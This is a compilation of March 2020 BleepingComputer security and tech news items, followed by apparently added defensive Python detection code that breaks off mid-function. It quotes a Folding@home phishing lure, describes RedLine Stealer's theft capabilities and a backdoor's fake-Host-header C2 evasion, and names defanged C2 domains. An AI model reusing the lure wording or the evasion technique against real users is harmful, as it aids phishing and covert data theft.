Today, Internal Market Commissioner Thierry Breton called on streaming providers to reduce the quality of the video streams to standard definition (SD) rather than high definition (HD) to reduce the bandwidth required for streaming a show.

"As a result of social distancing measures put in place across Europe to fight the Coronavirus pandemic, the demand for Internet capacity has increased, be it for teleworking, e-learning or entertainment purposes. This could put networks under strain at a moment when they need to be operational at the best possible level. In order to prevent congestion and to ensure the open Internet, Internal Market Commissioner Thierry Breton has called on the responsibility of streaming services, operators and users. Streaming platforms are advised to offer standard rather than high definition and to cooperate with telecom operators."

After a conversation between Commissioner Thierry Breton and Reed Hastings, Netflix has agreed to reduce the bit rate on all streams in Europe by 25% for the next 30 days.

"Following the discussions between Commissioner Thierry Breton and Reed Hastings - and given the extraordinary challenges raised by the coronavirus - Netflix has decided to begin reducing bit rates across all our streams in Europe for 30 days. We estimate that this will reduce Netflix traffic on European networks by around 25 percent while also ensuring a good quality service for our members", Netflix told BleepingComputer.

BleepingComputer has also contacted other streaming providers such as Hulu and Amazon to see if they would reduce their bit rate but have not heard back at this time.


Microsoft Delays Windows 10 1709 End of Service Due to Pandemic
22
.3.2020  Bleepingcomputer  OS

Microsoft is pushing back the scheduled end of service date of Windows 10, version 1709 to October 13, 2020, for the Enterprise, Education, and IoT Enterprise editions.

Windows 10 Version 1709 (also known as Fall Creators Update) should have reached end of service on April 14, 2020, according to the Windows lifecycle fact sheet.

"This means devices will receive monthly security updates only from May to October," Microsoft says. "The final security update for these editions of Windows 10, version 1709 will be released on October 13, 2020 instead of April 14, 2020."

Windows 10 1709 EoS delayed
"Microsoft has been evaluating the public health situation and its impact on our customers," the company explains.

"To ease one of the many burdens our customers are facing, Microsoft will delay the scheduled end of service date for the Enterprise, Education, and IoT Enterprise editions of Windows 10, version 1709."

Until it reaches the new end of service date, Windows 10, version 1709 security updates will be delivered to customers through the usual channels, including Windows Update, Windows Server Update Services, and the Microsoft Update Catalog.

This means that Windows 10 customers will not have to tweak their update management configurations since all supported versions of Microsoft Configuration Manager will support Windows 10, version 1709 update delivery until October 13, 2020.

If they have not already, IT teams are encouraged to shift to Windows Update for Business, allowing users to take both feature updates and quality updates directly from Microsoft in a secure and often faster manner. See Windows as a Service (WaaS) to learn how to keep Windows 10 devices up to date. - Microsoft

More Microsoft products reaching end of life in 2020
Several other major Microsoft products will also reach their end of support in 2020, with Office 2010, Visual Studio 2010, Windows 7, Windows Server 2008 (including 2008 R2), and multiple Windows 10 versions including 1709, 1803 and 1903 being the highlights.

Microsoft stops releasing bug fixes for newly discovered issues, security fixes for newly found vulnerabilities, as well as technical support for products that have already reached their end of support.

Customers who still use end of service software are urged by Redmond to upgrade as soon as possible to the latest on-premises or cloud versions to keep their devices bug-free and safe from attacks.

Microsoft provides a list of all products that will be retired or will reach the end of support in 2020, and a list of all products and their lifecycle policy timelines, in the Lifecycle Product Database.

A full list of end of support deadlines and related migration info for Microsoft products is available on the Search product lifecycle page.

Windows Update

@WindowsUpdate
We are delaying the scheduled end of service date for the Enterprise, Education, and IoT Enterprise editions of Windows 10, version 1709 to October 13, 2020. More information here: https://docs.microsoft.com/en-us/windows/release-information/windows-message-center#403 ….

11:59 PM - Mar 19, 2020
Google also halted new Chrome and Chrome OS releases
Google also announced yesterday that upcoming Chrome and Chrome OS major version releases are temporarily paused due to adjusted work schedules, as employees have to work from home because of the novel coronavirus pandemic.

"Due to adjusted work schedules at this time, we are pausing upcoming Chrome and Chrome OS releases," the company said.

"Our primary objectives are to ensure they continue to be stable, secure, and work reliably for anyone who depends on them."

However, the Chrome development team will continue to work remotely throughout the COVID-19 outbreak, prioritizing security updates that will still be released as Chrome v80 minor updates.

As proof, Google Chrome 80.0.3987.149 was released after the delayed release of Chrome v81 was announced, featuring security fixes patching 13 high severity vulnerabilities.


Netflix Party Lets You Watch Shows With Friends to Fight Isolation
22
.3.2020  Bleepingcomputer  Security

Feeling lonely during the period of social isolation or self-quarantine? A Chrome browser extension lets you binge-watch your favorite Netflix shows with friends and family while text chatting with them.

With social interaction at a minimum during the COVID-19 outbreak, people rightfully feel cooped up and lonely due to not being able to do anything with their friends.

A free Chrome browser extension called Netflix Party may help bring a little social interaction back into your life.

Netflix Party lets you watch shows together
Netflix Party allows friends and family to watch the same show together while providing a text chat room experience.

To use this browser extension, each user must be logged into Netflix and have the Netflix Party extension installed.

A user can then start a Netflix video, pause it, and click on the NP button in the Chrome Omnibar to create a group link that can be shared with others.

When creating this group, I suggest you make it so only the group creator can control the video playback so that other people do not pause the video whenever they want.

Create a Netflix Party
When another user with Netflix Party clicks on the shared link, they will automatically be brought to the selected video and a chat room will be shown on the right side of the screen.

This chat room lets you set your name, use one of a few available avatars, and chat with each other while you are watching the show or movie.

Netflix Party
The group creator can then start the show and pause it as needed, and the show will start and pause on the other party members' computers.

In BleepingComputer's tests, the process works very well, but there will be a slight delay between the person controlling the video and others who are part of the party. In our tests, this only caused about a one to two-second delay.

It should also be noted that this extension does track your activity and what Netflix shows you watch, but will tie this data to your anonymous Netflix Party ID.

If this does not bother you, then Netflix Party may be a great way to watch a show or movie with some friends to ease your social isolation.


Microsoft Teams Reaches 44M Daily Users After 12M Weekly Gain
22
.3.2020  Bleepingcomputer  IT

Microsoft announced today that its Teams collaboration service experienced a huge usage spike with 12 million new daily active users being added within the last seven days, bringing the total to 44 million.

The newly expanded Microsoft Teams user base has generated more than 900 million call and meeting minutes each day during the last week.

"It’s very clear that enabling remote work is more important than ever, and that it will continue to have lasting value beyond the COVID-19 outbreak," Corporate Vice President for Microsoft 365 Jared Spataro said.

"We are committed to building the tools that help organizations, teams, and individuals stay productive and connected even when they need to work apart."

Microsoft Teams, which is part of Microsoft's Office 365 enterprise subscription services, was launched in November 2016 as a direct competitor to Slack's instant messaging platform.

Slack reported in October 2019 that it has reached over 12 million daily active users, lagging behind the 13 million users reported by Microsoft earlier, in July 2019 — Teams reached 20 million daily active users in November 2019.

Microsoft

@Microsoft
Microsoft Teams' 44 million users have generated more than 900 million meeting minutes every day this week. As organizations adapt to remote work, we're helping users stay connected. https://msft.it/6005TdOZc

5:14 PM - Mar 19, 2020
Tens of thousands of users from hundreds of orgs
20 Microsoft Teams customers, including Ernst & Young, SAP, Pfizer, and Continental AG, currently have over 100,000 employees using the service on a daily basis, while Accenture has also added 440,000 additional Teams users.

At the moment, employees from 93 Fortune 100 companies are using Microsoft's Teams service, while more than 650,000 other organizations have more than 10,000 Teams users in their ranks.

Microsoft says that only intentional actions like replying to messages, joining meetings, or opening files made by users on their desktop, mobile, or web Teams clients are taken into consideration when counting the number of active users.

Interactions such as minimizing the Microsoft Teams client or closing the application do not automatically tag the user as being active.

Teams stats
Image: Microsoft
New features rolling out
Microsoft also announced that new features are rolling out to Microsoft Teams users including automatic real-time noise suppression to reduce background noise during meetings.

Microsoft Teams users will also get support for offline and low-bandwidth usage making it possible to read messages even when using it without an Internet connection and in low-bandwidth network environments.

"Teams users will now be able to open Teams even when no network is available," Microsoft says. "You will be able to create and read messages, browse previously viewed channels, and to view calendar summaries."

"If conditions are too poor to send a message, Teams will notify users of this and then save the message until the user has returned to a functioning network. This functionality is coming to Teams in the next few weeks."

Raise hands feature
Raise hands feature (Microsoft)
Users will also be able to draw attention while in Teams meetings using a new "raising hands" feature that makes it easy to actively take part in large meetings.

"Everyone will see a visual cue on the attendee’s video feed, as well as in the participant list, and can be sure to give them the room to participate in the conversation at hand," Microsoft adds.

The maximum number of members in an individual team will also be raised from 5,000 to 10,000 users in updates arriving over the next few weeks, and the number of people able to join a group chat has likewise been raised, to 250 users.

Microsoft Teams goes free, outage issues
Microsoft also announced earlier this month that Microsoft Teams will be free for the next six months to help organizations move towards a remote workplace during the COVID-19 pandemic.

"At Microsoft, the health and safety of employees, customers, partners and communities is our top priority," Microsoft EVP and President JP Courtois said. "By making Teams available to all for free for six months, we hope that we can support public health and safety by making remote work even easier."

At the start of this week, Microsoft Teams also experienced an outage caused by the huge influx of new users, affecting both EU and US users on March 16 and March 17, with reports mentioning messages not being sent, the admin portal being unreliable, and team member management not working properly.

Microsoft 365 Status
@MSFT365Status
We're investigating messaging-related functionality problems within Microsoft Teams. Please refer to TM206544 in your admin center for further details. ^JP

9:50 AM - Mar 16, 2020
Microsoft resolved the outage on March 17 and determined that it was caused by a caching issue within one of the Microsoft Teams infrastructure components.

The company is also currently working on scaling down select non-essential Office 365 capabilities in response to increased demand and the increasing number of new Microsoft 365 customers.

"Microsoft is actively monitoring performance and usage trends to ensure we're optimizing service for our customers worldwide, and accommodating new growth and demand," a Microsoft spokesperson told BleepingComputer.

"At the same time, these are unprecedented times and we’re also looking at what steps we can take to proactively prepare for these high-usage periods."


RedLine Info-Stealing Malware Spread by Folding@home Phishing
22
.3.2020  Bleepingcomputer  Phishing  Virus

A new phishing email is trying to take advantage of the Coronavirus pandemic and the race to develop medications by promoting a fake Folding@home app that installs an information-stealing malware.

Folding@home is a well-known distributed computing project that allows users to download software that uses their CPU and GPU cycles to research new drug opportunities and to gain a greater understanding of various diseases.

As the COVID-19 epidemic spreads throughout the world, Folding@home has added over 20 new projects focusing on coronavirus research and has seen a huge increase in usage by people all over the world.

Scammers take advantage of a good thing
With the rise in popularity of Folding@home, security researchers at ProofPoint have discovered a new phishing campaign that pretends to be from a company developing a cure for Coronavirus.

These emails have a subject of "Please help us with Fighting corona-virus" and state that they want you to help "speed up our process of finding the cure" by downloading and installing the Folding@home client.

Folding@home Phishing email
The text of this email reads:

Greetings from Mobility Research Inc and Folding@Thome
As we all know, recently corona-virus is becoming a major threat to the human society. We are a leading institution working on the cure to solve this world-wide crisis. However, we need your help. With your contribution, you can speed up our process of finding the cure. The process is very simple, you will need to install an app on your computer, which will allow us to use it to run simulations of the cure.
Embedded in the phishing email is a "Download now" button that when clicked will download a file called foldingathomeapp.exe, which is the Redline information-stealing Trojan.

"RedLine Stealer is new malware available for sale on Russian underground forums with several pricing options: $150 lite version; $200 pro version; $100 / month subscription option. It steals information from browsers such as login, autocomplete, passwords, and credit cards. It also collects information about the user and their system such as the username, their location, hardware configuration, and installed security software. A recent update to RedLine Stealer also added the ability to steal cryptocurrency cold wallets," ProofPoint states in their report.

Once installed, the malware will connect to a remote site to receive commands as to what types of data should be stolen from the victim. These instructions are sent using the SOAP messaging protocol, as seen in the image below.

RedLine getting instructions
This malware can steal saved login credentials, credit cards, cookies, and autocomplete fields from browsers. It can also collect data from FTP and IM clients, steal files, download files, execute commands, and send information back about the computer.

You can see an example of this malware in action in an Any.run session performed by security researcher James.

As this malware can steal a large amount of information, anyone who has fallen victim to this scam should immediately perform a scan using antivirus software.

They should also change the passwords at any online accounts that they frequent as they may now be in the possession of the attackers. This should be done from another computer until they are sure their infected computer has been cleaned.

It should also be noted that Folding@home is a terrific project and just because people are performing scams in their name, does not mean it should be avoided.

Just be sure to download the Folding@home client only from the legitimate site.


Critical RCE Bug in Windows 7 and Server 2008 Gets Micropatch
22
.3.2020  Bleepingcomputer  OS

A micropatch fixing a remote code execution (RCE) vulnerability in the Windows Graphics Device Interface (GDI+) is now available through the 0patch platform for Windows 7 and Server 2008 R2 users.

The patch is available for 0Patch users with PRO accounts with fully updated Windows 7 or Server 2008 R2 devices who haven't yet enrolled in Microsoft's Extended Security Updates (ESU) service (1, 2).

At the moment, only organizations with volume-licensing agreements or small-and-midsize businesses can get an ESU license until January 2023.

"All others have an official update available from Microsoft," as 0patch co-founder Mitja Kolsek told BleepingComputer. "If it turns out that many users on supported versions can't apply the official March update (e.g., functional problems), we'll port it for them too."

The Windows Graphics Device Interface RCE bug
Microsoft released security fixes for the vulnerability tracked as CVE-2020-0881 on March 10, during this month's Patch Tuesday, with all ESU enrolled organizations receiving them on all vulnerable Windows 7 or Server 2008 R2 systems.

The vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in memory, and it could enable attackers who successfully exploit it to take control of unpatched systems.

"An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights," Microsoft's security advisory explains.

"Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights."

Attackers can use both web-based and file-sharing attack scenarios to exploit CVE-2020-0881 via maliciously crafted websites or documents designed to exploit the memory corruption bug.

CVE-2020-0881 micropatch (0Patch)
CVE-2020-0881 micropatch for Windows 7 and Server 2008 R2
Micropatches are code sent through the 0Patch platform to Windows agents to fix security problems in real time; they are applied to running processes without the need for a system restart.

This micropatch is available to paying customers and it fixes the memory corruption issue in Windows GDI+ by adding a similar code block to the one Microsoft used in their security fix.

"Without this, a carefully crafted exploit could lead to deletion of a chosen data structure and subsequently to use-after-free," 0Patch tweeted.

On systems where it is applied, it "implements a logically identical check, but also records an exploitation attempt event before redirecting execution flow to the safe path. (32-bit patch has 4 instructions, 64-bit patch has 5.)"

A video of the micropatch in action is embedded below:



Food Delivery Service in Germany Under DDoS Attack
22
.3.2020  Bleepingcomputer  Attack

Cybercriminals saw the public health crisis, and the unprecedented restrictions it imposed on the restaurant industry, as a perfect opportunity to launch an attack on the systems of the Takeaway food delivery service in Germany.

The measures adopted by the country to limit the spread of the COVID-19 virus have a drastic impact on social life. Restaurants function under strict rules that limit the number of guests, impose a greater distance between the tables, and have to stay closed between 6pm and 6am.

Under these conditions, many Germans order in through food delivery services like Takeaway.com (Lieferando.de). Yet cybercriminals have launched a distributed denial-of-service attack on the website demanding 2 bitcoins (around $11,000) to stop the siege.

Jitse Groen, the founder and CEO of Takeaway, today posted on Twitter the news of the attack. He attached a screenshot with the attacker's demand that threatened to attack other company sites.


Soon after Groen's tweet, the German branch of the company announced that its systems had been attacked and entered in maintenance mode "to ensure the security of all data." This could cause delays in order processing.

Some customers complained that the service accepted new orders, despite its systems being crippled by the attack, and they are not being processed.

In a subsequent tweet, the company said that it would refund orders that had been paid online and were not delivered. This would not happen automatically, though; customers would have to contact them via email.

source: Lieferando
Lieferando boasts food delivery from more than 15,000 restaurants in Germany, so the impact of a DDoS attack is significant; not just for customers but for restaurant owners, too.

Times of crisis are typically when cybercriminals strike. As people in countries trying to slow COVID-19 infections are following social distancing recommendations, delivery services are experiencing an overload.

As this situation continues, heinous acts like this are likely to happen, especially from less-skilled attackers. More experienced actors may find a moral compass and take a break for the duration of the pandemic caused by the new coronavirus.

At least two ransomware actors stated that they would stop targeting health and medical organizations. Hospitals already have enough to deal with and any downtime they experience can cost human lives.

At the time of publishing, the Lieferando website was up and running.

Update March 19, 08:39 EDT: In a reply to BleepingComputer, Takeaway said that the attack stopped and the company is now dealing with the effects.


Most Ransomware Gets Executed Three Days After Initial Breach
22
.3.2020  Bleepingcomputer  Ransomware

Ransomware gets deployed three days after an organization's network gets infiltrated in the vast majority of attacks, with post-compromise deployment taking as long as 299 days in some of the dozens of attacks researchers at cybersecurity firm FireEye examined between 2017 and 2019.

In 75% of all ransomware incidents, as they found, the attackers will delay encrypting their victims' systems and will use that time to steal Domain Admin credentials that they can later use to distribute the ransomware payloads throughout the compromised environment.

More recently, ransomware operators have also started to harvest and exfiltrate their victims' data, later using it as leverage to make them pay the ransoms under the threat of leaking the stolen information.

While in most of the analyzed incidents the researchers observed extensive post-compromise malicious activity that could take weeks, the ransomware operators behind GandCrab and GlobeImposter were much faster, executing the payloads immediately after the initial infiltration.

Enough time for defense in 75% of incidents
Since ransomware operators deploy their payloads after at least three days during 75% of all ransomware incidents FireEye investigated, organizations would have enough time to defend themselves if using appropriate mitigations.

"This pattern suggests that for many organizations, if initial infections are detected, contained, and remediated quickly, the significant damage and cost associated with a ransomware infection could be avoided," the report says.

"In fact, in a handful of cases, Mandiant incident responders and FireEye Managed Defense contained and remediated malicious activity, likely preventing ransomware deployment."

During some of the successfully thwarted attacks, subsequent investigations resulted in the discovery of ransomware payloads already having been dropped but not executed on some of a victim's systems.

Ransomware deployment

To infiltrate their victims' networks, ransomware gangs have several favorite methods using RDP (LockerGoga), phishing emails with malicious links or attachments (Ryuk), and drive-by malware downloads (Bitpaymer and DoppelPaymer) as initial infection vectors.

"RDP was more frequently observed in 2017 and declined in 2018 and 2019," the report reads. "These vectors demonstrate that ransomware can enter victim environments by a variety of means, not all of which require user interaction."

After hours deployment during most attacks
As the FireEye research team also found, the ransomware was used to encrypt the victims' systems after work hours in roughly 76% of all examined attacks, "on a weekend or before 8:00 a.m. or after 6:00 p.m. on a weekday" according to the target's work week calendar.
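The two figures the report is built on, the dwell time between initial compromise and ransomware execution and the share of deployments that land after hours, are easy to reproduce on your own incident records. The following is an added example, not FireEye's code or data: it defines the after-hours test exactly as the report words it (weekend, or before 8:00 a.m. or after 6:00 p.m. on a weekday, in the victim's local time) and computes the metrics over a constructed set of eight incident timelines that, as an assumption, span the same range as the report (an immediate execution and a roughly 299-day case). A "response SLA" figure is also derived, showing how many of the incidents a team that contains intrusions within a given number of hours would have had a chance to stop.

```python
from dataclasses import dataclass
from datetime import datetime, time
from typing import Dict, List

WORKDAY_START = time(8, 0)   # 8:00 a.m.
WORKDAY_END = time(18, 0)    # 6:00 p.m.


@dataclass
class Incident:
    name: str
    first_malicious: datetime   # earliest observed attacker activity (initial compromise)
    ransomware_exec: datetime   # first ransomware execution, in the victim's local time


# Constructed incident timelines (not FireEye's data set). inc-G executes within
# minutes of entry, GandCrab-style; inc-D waits about 299 days.
SAMPLE_INCIDENTS: List[Incident] = [
    Incident("inc-A", datetime(2019, 3, 4, 9, 15), datetime(2019, 3, 7, 23, 40)),   # Thu night
    Incident("inc-B", datetime(2019, 5, 13, 10, 0), datetime(2019, 5, 18, 2, 10)),  # Saturday
    Incident("inc-C", datetime(2018, 11, 1, 14, 0), datetime(2018, 11, 1, 14, 5)),  # Thu, business hours
    Incident("inc-D", datetime(2018, 1, 10, 11, 0), datetime(2018, 11, 5, 19, 30)), # Mon evening
    Incident("inc-E", datetime(2019, 7, 22, 8, 30), datetime(2019, 7, 25, 6, 45)),  # Thu early morning
    Incident("inc-F", datetime(2019, 9, 2, 13, 0), datetime(2019, 9, 16, 17, 30)),  # Mon, business hours
    Incident("inc-G", datetime(2017, 6, 5, 9, 0), datetime(2017, 6, 5, 9, 2)),      # Mon, business hours
    Incident("inc-H", datetime(2019, 2, 11, 10, 0), datetime(2019, 2, 16, 11, 0)),  # Saturday
]


def dwell_days(inc: Incident) -> float:
    """Time from initial compromise to ransomware execution, in days."""
    return (inc.ransomware_exec - inc.first_malicious).total_seconds() / 86400.0


def is_after_hours(ts: datetime) -> bool:
    """Weekend, or before 8:00 a.m. / after 6:00 p.m. on a weekday (Monday == 0)."""
    if ts.weekday() >= 5:
        return True
    return ts.time() < WORKDAY_START or ts.time() > WORKDAY_END


def deployment_stats(incidents: List[Incident],
                     min_dwell_days: float = 3.0,
                     response_sla_hours: float = 24.0) -> Dict[str, float]:
    """Reproduce the report's headline metrics, plus a response-window figure.

    share_dwell_at_least_min: fraction of incidents with dwell >= min_dwell_days
    share_after_hours:        fraction whose ransomware ran outside working hours
    share_preventable_with_sla: fraction whose dwell exceeded the containment SLA,
                              i.e. where a team meeting that SLA had time to act
    """
    n = len(incidents)
    dwells = [dwell_days(i) for i in incidents]
    return {
        "share_dwell_at_least_min": sum(d >= min_dwell_days for d in dwells) / n,
        "share_after_hours": sum(is_after_hours(i.ransomware_exec) for i in incidents) / n,
        "share_preventable_with_sla": sum(d * 24.0 >= response_sla_hours for d in dwells) / n,
        "max_dwell_days": max(dwells),
        "min_dwell_days": min(dwells),
    }


def per_incident(incidents: List[Incident]) -> List[Dict[str, object]]:
    """One row per incident for a triage table."""
    return [{"name": i.name,
             "dwell_days": round(dwell_days(i), 2),
             "after_hours": is_after_hours(i.ransomware_exec)} for i in incidents]


if __name__ == "__main__":
    for row in per_incident(SAMPLE_INCIDENTS):
        print(row)
    for key, val in deployment_stats(SAMPLE_INCIDENTS).items():
        print(f"{key:28s} {val:.3f}")
```

Note that the after-hours test uses the victim's local clock; when you pull execution times out of centralized logs they are usually in UTC, so convert them before classifying, or the weekend and evening buckets will shift by the site's offset.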

This tactic allows the attackers to avoid having their actions noticed by the targeted organization's security team until it is too late, and ensures that incident responders cannot take all the measures they would be able to take during work hours to stop the attack.

"In other cases, attackers linked ransomware deployment to user actions," FireEye found. "For example, in 2019 incidents at retail and professional services firms, attackers created an Active Directory Group Policy Object to trigger ransomware execution based on user log on and log off."

After hours deployment
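One way to turn the after-hours figure above into a detection rule, as an added example that is not taken from the FireEye report: classify process-execution events against the victim organization's own work week (weekend, or before 8:00 a.m. or after 6:00 p.m. on a weekday) before alerting, rather than against the log's UTC clock. The event format, host names, image names and the fixed-offset time zone are constructed.

```python
from dataclasses import dataclass
from datetime import datetime, time, timedelta, timezone, tzinfo
from typing import List

# The window the report uses: a weekday between 8:00 a.m. and 6:00 p.m. is "work hours"
WORKDAY_START = time(8, 0)
WORKDAY_END = time(18, 0)


@dataclass(frozen=True)
class ExecEvent:
    ts_utc: datetime  # as logged by the SIEM, in UTC
    host: str
    image: str


def is_after_hours(ts_utc: datetime, org_tz: tzinfo) -> bool:
    """True when the event falls on a weekend or outside 08:00-18:00,
    judged in the organization's own zone rather than the log's UTC clock."""
    local = ts_utc.astimezone(org_tz)
    if local.weekday() >= 5:  # Saturday = 5, Sunday = 6
        return True
    t = local.time()
    return t < WORKDAY_START or t >= WORKDAY_END


def flag_after_hours(events: List[ExecEvent], org_tz: tzinfo) -> List[ExecEvent]:
    """Keep only the events that fall outside the organization's work hours."""
    return [e for e in events if is_after_hours(e.ts_utc, org_tz)]


# Constructed sample: an organization on US Eastern daylight time (UTC-4).
# A fixed offset keeps the example self-contained; in production use
# zoneinfo.ZoneInfo("America/New_York") so DST transitions are honoured.
ORG_TZ = timezone(timedelta(hours=-4), "EDT")


def utc(s: str) -> datetime:
    return datetime.fromisoformat(s).replace(tzinfo=timezone.utc)


# Constructed events; the image names are placeholders, not real IoCs.
SAMPLE_EVENTS = [
    ExecEvent(utc("2020-03-10T14:00:00"), "ws-01", "outlook.exe"),   # Tue 10:00 local
    ExecEvent(utc("2020-03-10T21:30:00"), "ws-04", "excel.exe"),     # Tue 17:30 local (21:30 UTC)
    ExecEvent(utc("2020-03-10T23:30:00"), "fs-02", "unknown1.exe"),  # Tue 19:30 local
    ExecEvent(utc("2020-03-11T11:30:00"), "fs-02", "unknown1.exe"),  # Wed 07:30 local
    ExecEvent(utc("2020-03-11T12:00:00"), "ws-03", "teams.exe"),     # Wed 08:00 local, boundary
    ExecEvent(utc("2020-03-14T15:00:00"), "dc-01", "unknown1.exe"),  # Sat 11:00 local
]

if __name__ == "__main__":
    for e in flag_after_hours(SAMPLE_EVENTS, ORG_TZ):
        print(e.ts_utc.astimezone(ORG_TZ).strftime("%a %H:%M"), e.host, e.image)
```

The 17:30 local event shows why the zone matters: in UTC it is 21:30 and would be flagged by a naive rule.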

To successfully defend against ransomware attacks, FireEye recommends addressing the infection vectors by enforcing multi-factor authentication, performing regular security audits, and using security solutions and email systems capable of detecting malware strains such as Trickbot, Emotet, and Dridex known for dropping ransomware payloads in multi-stage attacks.

Implementing security best practices such as regular anti-phishing training, network segmentation, regular backups, restricting Local Administrator accounts and using unique passwords for each of them, as well as carrying ransomware cyber insurance, could also help mitigate the effects of a ransomware infection.

"The good news is that particularly with post-compromise infections, there is often a window of time between the first malicious action and ransomware deployment," FireEye concluded.

"If network defenders can detect and remediate the initial compromise quickly, it is possible to avoid the significant damage and cost of a ransomware infection."


Ransomware Gangs to Stop Attacking Health Orgs During Pandemic
22.3.2020  Bleepingcomputer  Ransomware

Some ransomware operators have stated that they will no longer target health and medical organizations during the Coronavirus (COVID-19) pandemic.

Last night, BleepingComputer reached out to the operators of the Maze, DoppelPaymer, Ryuk, Sodinokibi/REvil, PwndLocker, and Ako Ransomware infections to ask if they would continue targeting health and medical organizations during the outbreak.

Below is what two of them said. Whether they plan on keeping their promise will have to be seen.

DoppelPaymer Ransomware
DoppelPaymer was the first to respond and stated that they do not normally target hospitals or nursing homes and will continue this approach during the pandemic.

"We always try to avoid hospitals, nursing homes, if it's some local gov - we always do not touch 911 (only occasionally is possible or due to misconfig in their network). Not only now.

If we do it by mistake - we'll decrypt for free. But some companies usually try to represent themselves as something other: we have development company that tried to be small real estate, had another company that tried to be dog shelter ) So if this happens we'll do double, triple check before releasing decrypt for free to such a things. But about pharma - they earns lot of extra on panic nowadays, we have no any wish to support them. While doctors do something, those guys earns."

When asked what happens if a medical organization gets encrypted, we were told that a victim should contact them on their email or Tor webpage to provide proof and get a decryptor.

Maze Ransomware
Today, the Maze operators responded to my questions by posting a "Press Release" that also states that they will stop all "activity" against all kinds of medical organizations until the end of the pandemic.

"We also stop all activity versus all kinds of medical organizations until the stabilization of the situation with virus."

We have not received a reply as to whether a free decryptor would be provided if a healthcare organization mistakenly gets encrypted.

Security companies offer free help
For now, should any healthcare organization get encrypted, both Emsisoft and Coveware announced today that they will offer their ransomware services for free to healthcare organizations during the pandemic.

This includes the following:

• Technical analysis of the ransomware.
• Development of a decryption tool whenever possible.
• As a last resort, ransom negotiation, transaction handling and recovery assistance, including replacement of the decryption tool supplied by the criminals with a custom tool that will recover data faster and with less chance of data loss.

While this help is greatly appreciated, I hope other ransomware operators will stop targeting healthcare organizations after reading this article so that it is not needed.

As this is a global epidemic, anyone could become sick with this virus, including the ransomware operator's loved ones.

Right now healthcare workers need to focus on helping people, not decrypting their files.


Hackers Hide Malware C2 Communication By Faking News Site Traffic
22.3.2020  Bleepingcomputer  Virus

A cyber-espionage group active since at least 2012 used a legitimate tool to shield their backdoor from analysis and thus avoid detection. As part of the same effort, the hackers also used a fake Host header named after a well-known news site.

The backdoor is referred to by the names Spark and EnigmaSpark and was deployed in a recent phishing campaign that appears to have been the work of the MoleRATs group, the low-budget division of the Gaza Cybergang. This is the actor responsible for operation SneakyPastes, detailed by Kaspersky, which relied on malware hosted on free sharing services like GitHub and Pastebin.

There are strong indications that the group used this backdoor since March 2017, deploying dozens of variants that contacted at least 15 command and control domains.

Researchers from multiple cyber security companies tracked the campaigns from this threat actor and analyzed the malware, tactics, and infrastructure used in the attacks.

Evasion tactics
The threat actor tried to hide signs of compromise using the Enigma Protector software - a legitimate tool for “protecting executable files from illegal copying, hacking, modification, and analysis.”

Based on the targets observed and the theme in the documents used for lures, this looks like a politically-motivated attack aimed at Arabic speakers interested in Palestine’s potential acceptance of the peace plan.

“Adversaries using EnigmaSpark likely relied on recipients’ significant interest in regional events or anticipated fear prompted by the spoofed content, illustrating how adversaries may exploit ongoing geopolitical events to enable malicious cyber activity” - IBM X-Force Incident Response and Intelligence Services (IRIS)

The infection chain leading to installing the EnigmaSpark backdoor started with the delivery of a malicious Microsoft Word document. The file is written in Arabic and prompts the recipient to enable editing to view the content.

The researchers found that the document fetches, from a Google Drive link, a malicious Word template embedded with a macro that delivers the final payload, ‘runawy.exe.’

source: IBM X-Force IRIS
To protect the operation, the hackers added some defenses such as password-protecting the macro and base64-encoding the backdoor, which was also stored on Google Drive.

Additionally, the malware binary was packed with Enigma Protector that adds some resistance to hacking and cracking attempts.

Another precaution the hackers took is the use of a fake Host header in the HTTP POST request that delivers victim system information to the command and control (C2) server. The real destination was ‘nysura[.]com,’ but the Host header names ‘cnet[.]com’ as the destination.

Common denominator
An X-Force (IRIS) investigation revealed that the attacker used this technique with other binaries. After unpacking ‘runawy.exe,’ they noticed that the resulting file was the same as ‘blaster.exe,’ a binary delivered by an executable packed by Themida, another legitimate tool that adds protection against inspecting or modifying a compiled application.

Multiple files were linked together because they share the unique string “S4.4P” and the cryptographic certificate signer “tg1678A4”: Wordeditor.exe, Blaster.exe (the unpacked version of runawy.exe and soundcloud.exe), HelpPane.exe, and taskmanager.exe.

In the case of Blaster, the same trick with the fake host header was used as in the case of ‘runawy,’ but the real destination server was different (’webtutorialz[.]com’).

source: IBM X-Force IRIS
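The fake Host header described for both runawy.exe and Blaster is detectable at the proxy: a request whose Host name never resolved to the server address it was sent to did not come from a normal browser lookup. The Python below is an added example, not code from IBM X-Force, Cybereason or BleepingComputer; the proxy log format, the DNS snapshot and its addresses (RFC 5737 documentation ranges) are constructed, and only the domain names come from the article.

```python
import re
from typing import Dict, List, Optional, Set

# Constructed proxy records (not from the IBM X-Force report):
# timestamp client server_ip method host_header path
SAMPLE_LOG = """\
2020-03-10T09:12:01Z 10.1.2.3 192.0.2.10 POST cnet.com /
2020-03-10T09:12:05Z 10.1.2.3 198.51.100.7 GET cnet.com /news/
2020-03-10T09:13:44Z 10.1.2.9 192.0.2.20 POST cnet.com /
2020-03-10T09:14:02Z 10.1.2.9 203.0.113.5 POST update.example /check
"""

# Constructed forward-DNS snapshot for the same time window. The addresses are
# documentation ranges, not the domains' real records. In practice this comes
# from resolver logs so that CDN rotation in the window is covered.
DNS: Dict[str, Set[str]] = {
    "cnet.com": {"198.51.100.7", "198.51.100.8"},
    "nysura.com": {"192.0.2.10"},
    "webtutorialz.com": {"192.0.2.20"},
}

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<src>\S+) (?P<dst>\S+) (?P<method>[A-Z]+) "
    r"(?P<host>\S+) (?P<path>\S+)$"
)


def reverse_index(dns: Dict[str, Set[str]]) -> Dict[str, Set[str]]:
    """Map each resolved address back to the names that produced it."""
    rev: Dict[str, Set[str]] = {}
    for name, ips in dns.items():
        for ip in ips:
            rev.setdefault(ip, set()).add(name)
    return rev


def check_host_header(dst_ip: str, host: str, dns: Dict[str, Set[str]]) -> Optional[str]:
    """None when the Host header agrees with the server address; 'mismatch'
    when the name resolves elsewhere; 'unresolved' when the resolver never
    answered for that name, so the header cannot have come from a lookup."""
    name = host.lower().split(":")[0]  # drop an explicit port, if any
    expected = dns.get(name)
    if expected is None:
        return "unresolved"
    return None if dst_ip in expected else "mismatch"


def scan(log_text: str, dns: Dict[str, Set[str]]) -> List[dict]:
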